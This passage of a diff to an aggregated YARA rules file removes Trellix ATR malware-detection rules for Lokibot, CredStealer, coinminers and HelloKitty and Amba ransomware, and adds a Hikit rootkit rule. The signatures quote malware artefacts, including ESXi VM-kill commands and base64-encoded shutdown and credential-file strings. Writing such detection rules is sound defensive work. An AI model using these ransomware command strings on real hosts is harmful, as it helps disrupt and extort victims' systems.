+		$1 = {90506F1C825F7AE0D8605F5C627CA325BFF199AB60A63DE8A90E923F4B18D7FB039E1DEC89D573AAB0A14C1D4BA70EB444753A41C03082A60CB4DB551393F2C50988A3181E7F31D01B5AAD94070432D98F18655AB8A555919FEFEA9DE1EDF1}
+		$2 = {D5EEF61336015A85FF04ED298A6BDD6742FF153E33DAF9B383A5FFDCE7E64D47748DB5FF2609DF9BD5C66735FF6916797B2D365313FF1461EAEB9DAEA754FF6D4D55D1956CC8CBFF75C10CE74BF88C8DFF3B553B839D42609FFF2916227230}
+		$3 = {6C750DDC932124500CE9B5AB91CE101BE9AD348220E9423124512282373675152281023428825C51770FE9841F853375125382F732750A5B83F60FEB6AEE2282647462228269745AEE22826F7452228275744AEE2282787442}
+		$4 = {19A8A063FFAAAF6C1E7F78A896FFFA5C8F30BA98B69CFF1961E107BEB7636AFF9EA56A4FC4EDE3F1FF295235ACD0185726FFADA6B8CB54B342C9FF86F58524DC91617BFFB4388DBE01B6CF86}
+		$5 = {50C449606B20184A6328556032197660AAF9507861609F6160640560B4546160C3A194056070C4A09EC4A01A0461A4C4A0831B16600561916069A291607061C09160AA1CB6204A}
+		$6 = {FFEB19D2636B8B95273156BB63E8C78470D55970F47CF26574B46DE86EE084704590CA8053F15320258BBD1AACF18B04F2E965C6605CB10880B7E8FCF53DF5EB0621635EFF}
+		$7 = {7E31126E14B8FF98554F6FCFB64207FFCF8D93B2573609C2FF99E4409F73BB9322FF1E5E380DC0BBABCAFF4B901EDF61BD6A68FFEE3253728C7769ABFF7BCDA939C959A282}
+		$8 = {1970FFC6F8AA7C32EE693CFF369579E5355EF62CFF682CEAF20BA3EA1CFF1AAC638666431B20FF54293D1E709C231AFFCD11B55599F64CB9FF1E5A9015DC867F}
+		$9 = {8DFF93B2573609C299E4FF409F73BB93221E5EFF380DC0BBABCA4B90FF1EDF61BD6A68EE32FF53728C7769AB7BCDFFA939C959A282D312FF5DD04F0370CE811F}
+		$10 = {DF5519064E31101CF3DA96C15FF96728B708F358F51759E3A22FFA1CF1BB986A2038D6753E6BF037945B8469ADF20BAB71E10F3DE27735F640704C970DFE8672}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
 rule TRELLIX_ARC_Chimera_Recordedtv_Modified : TROJAN FILE
 {
@@ -151407,4563 +151454,4066 @@ rule TRELLIX_ARC_Chimera_Recordedtv_Modified : TROJAN FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 900KB and all of them
 }
-rule TRELLIX_ARC_STEALER_Lokibot : STEALER FILE
+rule TRELLIX_ARC_Apt_Hikit_Rootkit : ROOTKIT FILE
 {
 	meta:
-		description = "Rule to detect Lokibot stealer"
+		description = "Rule to detect the rootkit hikit based on PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "75f502a3-2d9f-5ccf-93f8-2d6a73e9e1b7"
-		date = "2020-09-23"
-		modified = "2020-09-25"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/stealer/STEALER_Lokibot.yar#L1-L39"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "999a69394a545f726cf15e4361e0dfc17eeac6544e6816a0ad140316e9642510"
-		score = 75
-		quality = 70
-		tags = "STEALER, FILE"
-		rule_version = "v1"
-		malware_type = "stealer"
-		malware_family = "Ransomware:W32/Lokibot"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
-		hash1 = "0e40f4fdd77e1f90279c585cfc787942b8474e5216ff4d324d952ef6b74f25d2"
-		hash2 = "3ad36afad12d8cf245904285c21a8db43f9ed9c82304fdc2f27c4dd1438e4a1d"
-		hash3 = "26fbdd516b3c1bfa36784ef35d6bc216baeb0ef2d0c0ba036ff9296da2ce2c84"
-
-	strings:
-		$sq1 = { 55 8B EC 56 8B 75 08 57 56 E8 ?? ?? ?? ?? 8B F8 59 85 FF 75 04 33 C0 EB 20 56 6A 00 57 E8 ?? ?? ?? ?? 6A 0C E8 ?? ?? ?? ?? 83 C4 10 85 C0 74 E5 83 60 08 00 89 38 89 70 04 5F 5E 5D C3 }
-		$sq2 = { 55 8B EC 83 EC 0C 53 56 57 33 DB BE ?? ?? ?? ?? 53 53 56 6A 09 E8 ?? ?? ?? ?? 6A 10 6A 01 53 53 8D 4D F8 51 FF D0 53 53 56 6A 09 E8 ?? ?? ?? ?? 6A 08 6A 01 53 53 8D 4D F8 51 FF D0 85 C0 0F 84 2B 01 00 00 6A 24 E8 ?? ?? ?? ?? 59 8B D8 33 C0 6A 09 59 8B FB F3 AB 66 8B 4D 24 B8 03 66 00 00 C7 03 08 02 00 00 66 85 C9 74 03 0F B7 C1 8B 4D 08 33 D2 0F B7 C0 89 43 04 89 53 08 85 C9 74 12 C7 43 08 08 00 00 00 8B 01 89 43 0C 8B 41 04 89 43 10 8B 4D 0C 85 C9 74 0F 83 43 08 08 8B 01 89 43 14 8B 41 04 89 43 18 8B 4D 10 85 C9 74 0F 83 43 08 08 8B 01 89 43 1C 8B 41 04 89 43 20 8B 7B 08 8B 75 F8 83 C7 0C 52 52 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 8D 4D FC 51 6A 00 6A 00 57 53 56 FF D0 85 C0 74 75 8B 75 FC 33 C0 40 83 7D 20 00 0F 45 45 20 33 FF 57 57 68 ?? ?? ?? ?? 6A 09 89 45 F4 E8 ?? ?? ?? ?? 57 8D 4D F4 51 6A 04 56 FF D0 85 C0 74 3B 39 7D 14 74 1A 8B 75 FC 57 57 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 57 FF 75 14 6A 01 56 FF D0 8B 55 18 8B 4D FC 53 89 0A 8B 55 1C 8B 4D F8 89 0A E8 ?? ?? ?? ?? 33 C0 59 40 EB 21 FF 75 FC E8 BF FB FF FF 59 EB 02 33 FF 53 E8 ?? ?? ?? ?? 57 FF 75 F8 E8 6B FB FF FF 83 C4 0C 33 C0 5F 5E 5B 8B E5 5D C3 }
-		$sq3 = { 55 8B EC 83 EC 0C 53 8B 5D 0C 56 57 6A 10 33 F6 89 75 F8 89 75 FC 58 89 45 F4 85 DB 75 0E FF 75 08 E8 ?? ?? ?? ?? 8B D8 8B 45 F4 59 50 E8 ?? ?? ?? ?? 8B F8 59 85 FF 0F 84 B6 00 00 00 FF 75 F4 56 57 E8 C4 ?? ?? ?? 83 C4 0C 56 56 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 68 00 00 00 F0 6A 01 56 56 8D 4D F8 51 FF D0 85 C0 0F 84 84 00 00 00 8B 75 F8 6A 00 6A 00 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 8D 4D FC 51 6A 00 6A 00 68 03 80 00 00 56 FF D0 85 C0 74 51 6A 00 53 FF 75 08 FF 75 FC E8 7F FD FF FF 83 C4 10 85 C0 74 3C 8B 75 FC 6A 00 6A 00 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 6A 00 8D 4D F4 51 57 6A 02 56 FF D0 85 C0 74 19 FF 75 FC E8 16 FD FF FF 6A 00 FF 75 F8 E8 26 FD FF FF 83 C4 0C 8B C7 EB 0E 6A 00 FF 75 F8 E8 15 FD FF FF 59 59 33 C0 5F 5E 5B 8B E5 5D C3 }
-		$sq4 = { 55 8B EC 83 7D 10 00 56 57 8B 7D 0C 57 74 0E E8 ?? ?? ?? ?? 8B F0 33 C0 03 F6 40 EB 09 E8 ?? ?? ?? ?? 8B F0 33 C0 83 7D 14 00 59 75 24 50 FF 75 08 E8 2C 00 00 00 59 59 83 F8 01 74 04 33 C0 EB 1D 56 FF 75 08 E8 C5 FE FF FF 59 59 83 F8 01 75 EC 56 57 FF 75 08 E8 CA FE FF FF 83 C4 0C 5F 5E 5D C3 }
-		$sq5 = { 55 8B EC 53 56 8B 75 0C 57 85 F6 75 0B FF 75 08 E8 ?? ?? ?? ?? 59 8B F0 6B C6 03 89 45 0C 8D 58 01 53 E8 ?? ?? ?? ?? 8B F8 59 85 FF 74 42 53 6A 00 57 E8 ?? ?? ?? ?? 83 C4 0C 33 D2 85 F6 74 27 8B 45 08 0F B6 0C 02 8B C1 83 E1 0F C1 E8 04 8A 80 ?? ?? ?? ?? 88 04 57 8A 81 ?? ?? ?? ?? 88 44 57 01 42 3B D6 72 D9 8B 45 0C C6 04 07 00 8B C7 5F 5E 5B 5D C3 }
-		$sq6 = { 55 8B EC 53 56 57 FF 75 08 E8 ?? ?? ?? ?? 33 C9 6A 02 5B 8D B8 A0 1F 00 00 8B C7 F7 E3 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B F0 59 59 85 F6 74 6F 8D 0C 3F 51 6A 00 56 E8 ?? ?? ?? ?? 8D 45 0C 50 FF 75 08 56 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B F8 83 C4 1C 85 FF 74 40 33 C9 8D 47 02 F7 E3 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B D8 59 85 DB 74 25 8D 0C 7D 02 00 00 00 51 6A 00 53 E8 ?? ?? ?? ?? 57 56 53 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 1C 8B C3 EB 09 56 E8 ?? ?? ?? ?? 59 33 C0 5F 5E 5B 5D C3 }
-		$sq7 = { 55 8B EC 81 EC 80 00 00 00 56 57 E8 ?? ?? ?? ?? 6A 1F 59 BE ?? ?? ?? ?? 8D 7D 80 F3 A5 33 C9 6A 02 5A 66 A5 8B 7D 08 8D 47 01 F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B F0 59 85 F6 74 4D 8D 04 7D 02 00 00 00 4F 89 45 08 53 50 6A 00 56 E8 ?? ?? ?? ?? 83 C4 0C 33 DB 85 FF 74 1C E8 ?? ?? ?? ?? 33 D2 6A 7E 59 F7 F1 D1 EA 66 8B 44 55 80 66 89 04 5E 43 3B DF 72 E4 56 E8 ?? ?? ?? ?? 3B F8 8B 45 08 59 77 C4 8B C6 5B EB 02 33 C0 5F 5E 8B E5 5D C3 }
-		$sq8 = { 55 8B EC 81 EC 50 02 00 00 53 56 57 6A 0A E8 ?? ?? ?? ?? 59 33 DB 6A 2E 5E 39 5D 14 0F 84 13 01 00 00 FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 59 59 85 F6 0F 84 F7 00 00 00 53 53 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 56 FF D0 8B D8 83 FB FF 0F 84 CC 00 00 00 F6 85 B0 FD FF FF 10 0F 84 97 00 00 00 83 7D 1C 00 74 2E 8D 85 DC FD FF FF 68 ?? ?? ?? ?? 50 E8 0A ?? ?? ?? 59 59 85 C0 75 7A 8D 85 DC FD FF FF 68 ?? ?? ?? ?? 50 E8 F3 ?? ?? ?? 59 59 85 C0 75 63 8D 85 DC FD FF FF 50 E8 ?? ?? ?? ?? 59 83 F8 03 73 0C 6A 2E 58 66 39 85 DC FD FF FF 74 45 8D 85 DC FD FF FF 50 FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 0C 89 45 14 85 C0 74 27 6A 01 6A 00 6A 01 FF 75 10 FF 75 0C 50 E8 14 FF FF FF FF 75 14 8B F8 E8 ?? ?? ?? ?? 83 C4 1C 85 FF 0F 85 EE 00 00 00 33 C0 50 50 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 53 FF D0 85 C0 0F 85 3B FF FF FF 53 E8 ?? ?? ?? ?? 59 56 E8 ?? ?? ?? ?? 59 33 DB 6A 2E 5E FF 75 0C FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 0C 85 FF 0F 84 CF 00 00 00 53 53 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 57 FF D0 8B D8 83 FB FF 0F 84 A6 00 00 00 8D 85 DC FD FF FF 50 E8 ?? ?? ?? ?? 59 83 F8 03 73 09 66 39 B5 DC FD FF FF 74 3E 83 BD B0 FD FF FF 10 75 06 83 7D 18 00 74 2F 8D 85 DC FD FF FF 50 FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 0C 85 F6 74 12 83 7D 10 00 74 40 56 FF 55 10 56 E8 ?? ?? ?? ?? 59 59 33 C0 50 50 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 53 FF D0 85 C0 74 29 6A 2E 5E EB 85 56 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8B C7 EB 22 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8B C6 EB 10 53 E8 ?? ?? ?? ?? 59 57 E8 ?? ?? ?? ?? 59 33 C0 5F 5E 5B 8B E5 5D C3 }
-		$sq9 = { 83 3D 14 ?? ?? ?? ?? 56 74 0A 8B 35 20 ?? ?? ?? 85 F6 75 66 53 57 BB E0 01 00 00 33 FF 53 89 3D 14 ?? ?? ?? E8 F0 F8 FF FF 33 F6 A3 14 ?? ?? ?? 46 59 85 C0 74 12 6A 78 57 50 89 35 20 ?? ?? ?? E8 A6 F8 FF FF 83 C4 0C 53 89 3D 18 ?? ?? ?? E8 C5 F8 FF FF A3 18 ?? ?? ?? 59 85 C0 74 14 6A 78 57 50 89 35 20 ?? ?? ?? E8 7E F8 FF FF 83 C4 0C EB 06 8B 35 20 ?? ?? ?? 5F 5B 8B C6 5E C3 }
-		$sq10 = { 55 8B EC 51 51 83 65 FC 00 53 56 57 64 A1 30 00 00 00 89 45 FC 8B 45 FC 8B 40 0C 8B 58 0C 8B F3 8B 46 18 FF 76 28 89 45 F8 E8 CE FA FF FF 8B F8 59 85 FF 74 1F 6A 00 57 E8 32 01 00 00 57 E8 ?? ?? ?? ?? 03 C0 50 57 E8 71 FA FF FF 83 C4 14 39 45 08 74 11 8B 36 3B DE 75 C6 33 C0 5F 5E 5B 8B E5 5D C2 04 00 8B 45 F8 EB F2 }
-		$sq11 = { A1 ?? ?? ?? ?? 85 C0 74 07 50 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? 85 C0 74 07 50 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? 85 C0 74 07 50 E8 ?? ?? ?? ?? 59 33 C0 A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? C3 }
-		$sq12 = { 55 8B EC 56 8B 75 0C 57 85 F6 74 48 56 E8 ?? ?? ?? ?? 59 85 C0 74 3D 56 E8 ?? ?? ?? ?? 59 85 C0 74 32 83 65 0C 00 8D 45 0C 6A 01 50 56 E8 ?? ?? ?? ?? 8B F8 83 C4 0C 85 FF 74 19 8B 45 0C 85 C0 74 12 83 7D 14 00 74 12 39 45 14 73 0D 57 E8 ?? ?? ?? ?? 59 33 C0 5F 5E 5D C3 83 7D 10 00 74 1A 6A 00 6A 01 56 E8 ?? ?? ?? ?? 59 50 FF 75 08 E8 1F 00 00 00 8B 45 0C 83 C4 10 50 57 FF 75 08 E8 FF FE FF FF 57 8B F0 E8 ?? ?? ?? ?? 83 C4 10 8B C6 EB C3 }
-		$sq13 = { 55 8B EC 83 EC 18 56 FF 75 08 E8 ?? ?? ?? ?? 50 89 45 F0 E8 ?? ?? ?? ?? 8B F0 59 59 85 F6 0F 84 C0 00 00 00 53 8B 5D 0C 33 C9 57 6A 04 5A 8B C3 F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 83 65 F4 00 8B F8 83 65 FC 00 59 85 DB 74 6D 8B 45 10 83 C0 FC FF 75 F0 83 C0 04 89 45 E8 6A 00 56 8B 00 89 45 EC E8 ?? ?? ?? ?? FF 75 F0 FF 75 08 56 E8 ?? ?? ?? ?? 83 65 F8 00 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 20 EB 1F FF 75 EC 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 32 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 45 F8 59 59 85 C0 75 DD 8B 45 FC 40 89 45 FC 3B C3 8B 45 E8 72 99 56 E8 ?? ?? ?? ?? 59 39 5D F4 75 12 8B C7 EB 17 8B 45 FC 8B 4D F8 FF 45 F4 89 0C 87 EB D7 57 E8 ?? ?? ?? ?? 59 33 C0 5F 5B 5E 8B E5 5D C3 }
-		$sq14 = { 55 8B EC 8B 45 0C 53 56 8B 75 08 57 8B 4E 04 03 C1 8D 3C 09 3B F8 77 06 8D B8 F4 01 00 00 33 C9 8B C7 6A 04 5A F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B D8 59 85 DB 74 26 57 6A 00 53 E8 ?? ?? ?? ?? FF 76 08 FF 36 53 E8 ?? ?? ?? ?? FF 36 E8 ?? ?? ?? ?? 33 C0 89 1E 83 C4 1C 89 7E 04 40 5F 5E 5B 5D C3 }
-		$sq15 = { 55 8B EC 83 7D 0C 00 57 74 39 8B 7D 10 85 FF 74 32 56 8B 75 08 8B 46 08 03 C7 3B 46 04 76 09 57 56 E8 3F FF FF FF 59 59 8B 46 08 03 06 57 FF 75 0C 50 E8 ?? ?? ?? ?? 01 7E 08 83 C4 0C 33 C0 40 5E EB 02 33 C0 5F 5D C3 }
-
-	condition:
-		uint16( 0 ) == 0x5a4d and any of them
-}
-rule TRELLIX_ARC_STEALER_Emirates_Statement : STEALER
-{
-	meta:
-		description = "Credentials Stealing Attack"
-		author = "Christiaan Beek | McAfee ATR Team"
-		id = "b5a6d996-8a3d-5238-95af-bf5ff893bbc5"
-		date = "2013-06-30"
-		modified = "2020-08-14"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/stealer/STEALER_EmiratesStatement.yar#L1-L24"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "7cf757e0943b0a6598795156c156cb90feb7d87d4a22c01044499c4e1619ac57"
-		logic_hash = "17eaddf375fc1875fb0275f8c0f93dfe921b452bdc6eb471adc155f749492328"
-		score = 75
-		quality = 45
-		tags = "STEALER"
-		rule_version = "v1"
-		malware_type = "stealer"
-		malware_family = "Stealer:W32/DarkSide"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
-
-	strings:
-		$string0 = "msn.klm"
-		$string1 = "wmsn.klm"
-		$string2 = "bms.klm"
-
-	condition:
-		all of them
-}
-rule TRELLIX_ARC_STEALER_Credstealesy : STEALER
-{
-	meta:
-		description = "Generic Rule to detect the CredStealer Malware"
-		author = "IsecG – McAfee Labs"
-		id = "90e23ed8-3243-519b-8eb4-9db5902c73d3"
-		date = "2015-05-08"
+		id = "c53acbc6-8f4a-590b-8dd7-ce4da6d79cf8"
+		date = "2012-08-20"
 		modified = "2020-08-14"
-		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/when-hackers-get-hacked-the-malware-servers-of-a-data-stealing-campaign/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/stealer/STEALER_credstealer.yar#L1-L24"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "3d007fc0d2e2eb3d8f0c2b86dd01ede482e72f6c67fd6d284d77c47b53021b3c"
-		score = 75
-		quality = 70
-		tags = "STEALER"
-		rule_version = "v1"
-		malware_type = "stealer"
-		malware_family = "Stealer:W32/CredStealer"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
-
-	strings:
-		$my_hex_string = "CurrentControlSet\\Control\\Keyboard Layouts\\" wide
-		$my_hex_string2 = {89 45 E8 3B 7D E8 7C 0F 8B 45 E8 05 FF 00 00 00 2B C7 89 45 E8}
-
-	condition:
-		$my_hex_string and $my_hex_string2
-}
-
-rule TRELLIX_ARC_Trojan_Coinminer : FILE
-{
-	meta:
-		description = "Rule to detect Coinminer malware"
-		author = "Trellix ATR"
-		id = "ec1f4fb7-bce3-5d5b-bbff-50f9bfc90298"
-		date = "2021-07-22"
-		modified = "2022-01-19"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/miners/Trojan_CoinMiner.yar#L3-L23"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "0d9d502eb0a54f90044f42f8ce485a2df6814064172cb7bf006a8c8a51976acd"
-		score = 75
-		quality = 70
-		tags = "FILE"
-		version = "v1"
-		hash1 = "3bdac08131ba5138bcb5abaf781d6dc7421272ce926bc37fa27ca3eeddcec3c2"
-		hash2 = "d60766c4e6e77de0818e59f687810f54a4e08505561a6bcc93c4180adb0f67e7"
-
-	strings:
-		$seq0 = { df 75 ab 7b 80 bf 83 c1 48 b3 18 74 70 01 24 5c }
-		$seq1 = { 08 37 4e 6e 0f 50 0b 11 d0 98 0f a8 b8 27 47 4e }
-		$seq2 = { bf 17 5a 08 09 ab 80 2f a1 b0 b1 da 47 9f e1 61 }
-		$seq3 = { 53 36 34 b2 94 01 cc 05 8c 36 aa 8a 07 ff 06 1f }
-		$seq4 = { 25 30 ae c4 44 d1 97 82 a5 06 05 63 07 02 28 3a }
-		$seq5 = { 01 69 8e 1c 39 7b 11 56 38 0f 43 c8 5f a8 62 d0 }
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and pe.imphash ( ) == "e4290fa6afc89d56616f34ebbd0b1f2c" and 3 of ( $seq* ) )
-}
-rule TRELLIX_ARC_MINER_Monero_Mining_Detection : MINER FILE
-{
-	meta:
-		description = "Monero mining software"
-		author = "Trellix ATR team"
-		id = "98ee7711-16ee-58e1-b52f-c68dd5f2b8a3"
-		date = "2018-04-05"
-		modified = "2022-01-19"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/miners/MINER_Monero.yar#L1-L43"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "4c1815186b0eb9e6be5fb0fcad02fd981ac9cf79c485fe12ce4a73054ef9fda2"
-		score = 75
-		quality = 70
-		tags = "MINER, FILE"
-		rule_version = "v1"
-		malware_type = "miner"
-		malware_family = "Ransom:W32/MoneroMiner"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
-
-	strings:
-		$1 = "* COMMANDS:     'h' hashrate, 'p' pause, 'r' resume" fullword ascii
-		$2 = "--cpu-affinity       set process affinity to CPU core(s), mask 0x3 for cores 0 and 1" fullword ascii
-		$3 = "* THREADS:      %d, %s, av=%d, %sdonate=%d%%%s" fullword ascii
-		$4 = "--user-agent         set custom user-agent string for pool" fullword ascii
-		$5 = "-O, --userpass=U:P       username:password pair for mining server" fullword ascii
-		$6 = "--cpu-priority       set process priority (0 idle, 2 normal to 5 highest)" fullword ascii
-		$7 = "-p, --pass=PASSWORD      password for mining server" fullword ascii
-		$8 = "* VERSIONS:     XMRig/%s libuv/%s%s" fullword ascii
-		$9 = "-k, --keepalive          send keepalived for prevent timeout (need pool support)" fullword ascii
-		$10 = "--max-cpu-usage=N    maximum CPU usage for automatic threads mode (default 75)" fullword ascii
-		$11 = "--nicehash           enable nicehash/xmrig-proxy support" fullword ascii
-		$12 = "<!--The ID below indicates application support for Windows 10 -->" fullword ascii
-		$13 = "* CPU:          %s (%d) %sx64 %sAES-NI" fullword ascii
-		$14 = "-r, --retries=N          number of times to retry before switch to backup server (default: 5)" fullword ascii
-		$15 = "-B, --background         run the miner in the background" fullword ascii
-		$16 = "* API PORT:     %d" fullword ascii
-		$17 = "--api-access-token=T access token for API" fullword ascii
-		$18 = "-t, --threads=N          number of miner threads" fullword ascii
-		$19 = "--print-time=N       print hashrate report every N seconds" fullword ascii
-		$20 = "-u, --user=USERNAME      username for mining server" fullword ascii
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and ( 8 of them ) ) or ( all of them )
-}
-rule TRELLIX_ARC_Ransom_Linux_Hellokitty_0721 : RANSOMWARE FILE
-{
-	meta:
-		description = "rule to detect Linux variant of the Hello Kitty Ransomware"
-		author = "Christiaan @ ATR"
-		id = "097b02e7-93d8-5d4f-9964-7b660b3cd7b9"
-		date = "2021-07-19"
-		modified = "2021-07-19"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Linux_HelloKitty0721.yar#L1-L28"
+		reference = "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_hikit_rootkit_pdb.yar#L1-L28"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "77a3809df4c7c591a855aaecd702af62935952937bb81661aa7f68e64dcf4fb4"
+		logic_hash = "8a425ababdfbe95bd8ac7d4f519be16c0f1fd0b7eea2874124db2f00dd6eb56d"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
-		Rule_Version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:Linux/HelloKitty"
-		hash1 = "ca607e431062ee49a21d69d722750e5edbd8ffabcb54fa92b231814101756041"
-		hash2 = "556e5cb5e4e77678110961c8d9260a726a363e00bf8d278e5302cb4bfccc3eed"
-
-	strings:
-		$v1 = "esxcli vm process kill -t=force -w=%d" fullword ascii
-		$v2 = "esxcli vm process kill -t=hard -w=%d" fullword ascii
-		$v3 = "esxcli vm process kill -t=soft -w=%d" fullword ascii
-		$v4 = "error encrypt: %s rename back:%s" fullword ascii
-		$v5 = "esxcli vm process list" fullword ascii
-		$v6 = "Total VM run on host:" fullword ascii
-		$v7 = "error lock_exclusively:%s owner pid:%d" fullword ascii
-		$v8 = "Error open %s in try_lock_exclusively" fullword ascii
-		$v9 = "Mode:%d  Verbose:%d Daemon:%d AESNI:%d RDRAND:%d " fullword ascii
-		$v10 = "pthread_cond_signal() error" fullword ascii
-		$v11 = "ChaCha20 for x86_64, CRYPTOGAMS by <appro@openssl.org>" fullword ascii
-
-	condition:
-		( uint16( 0 ) == 0x457f and filesize < 200KB and ( 8 of them ) ) or ( all of them )
-}
-rule TRELLIX_ARC_Amba_Ransomware : RANSOMWARE FILE
-{
-	meta:
-		description = "Rule to detect Amba Ransomware"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "961f2892-e462-55e4-bd96-7dff895cb1e6"
-		date = "2017-07-03"
-		modified = "2020-08-14"
-		reference = "https://www.enigmasoftware.com/ambaransomware-removal/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_amba.yar#L1-L41"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "b9b6045a45dd22fcaf2fc13d39eba46180d489cb4eb152c87568c2404aecac2f"
-		logic_hash = "0830ab49956711d3e6ad64785edcf54146a24756c4ab66384305dc18091867bd"
-		score = 75
-		quality = 68
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Amba"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
-
-	strings:
-		$s1 = "64DCRYPT.SYS" fullword wide
-		$s2 = "32DCRYPT.SYS" fullword wide
-		$s3 = "64DCINST.EXE" fullword wide
-		$s4 = "32DCINST.EXE" fullword wide
-		$s5 = "32DCCON.EXE" fullword wide
-		$s6 = "64DCCON.EXE" fullword wide
-		$s8 = "32DCAPI.DLL" fullword wide
-		$s9 = "64DCAPI.DLL" fullword wide
-		$s10 = "ICYgc2h1dGRvd24gL2YgL3IgL3QgMA==" fullword ascii
-		$s11 = "QzpcVXNlcnNcQUJDRFxuZXRwYXNzLnR4dA==" fullword ascii
-		$s12 = ")!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v)" fullword ascii
-		$s13 = "RGVmcmFnbWVudFNlcnZpY2U="
-		$s14 = "LWVuY3J5cHQgcHQ5IC1wIA=="
-		$s15 = "LWVuY3J5cHQgcHQ3IC1wIA=="
-		$s16 = "LWVuY3J5cHQgcHQ2IC1wIA=="
-		$s17 = "LWVuY3J5cHQgcHQzIC1wIA=="
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 8 of them ) ) or ( all of them )
-}
-rule TRELLIX_ARC_RANSOM_Mountlocker : RANSOMWARE FILE
-{
-	meta:
-		description = "Rule to detect Mount Locker ransomware"
-		author = "McAfee ATR Team"
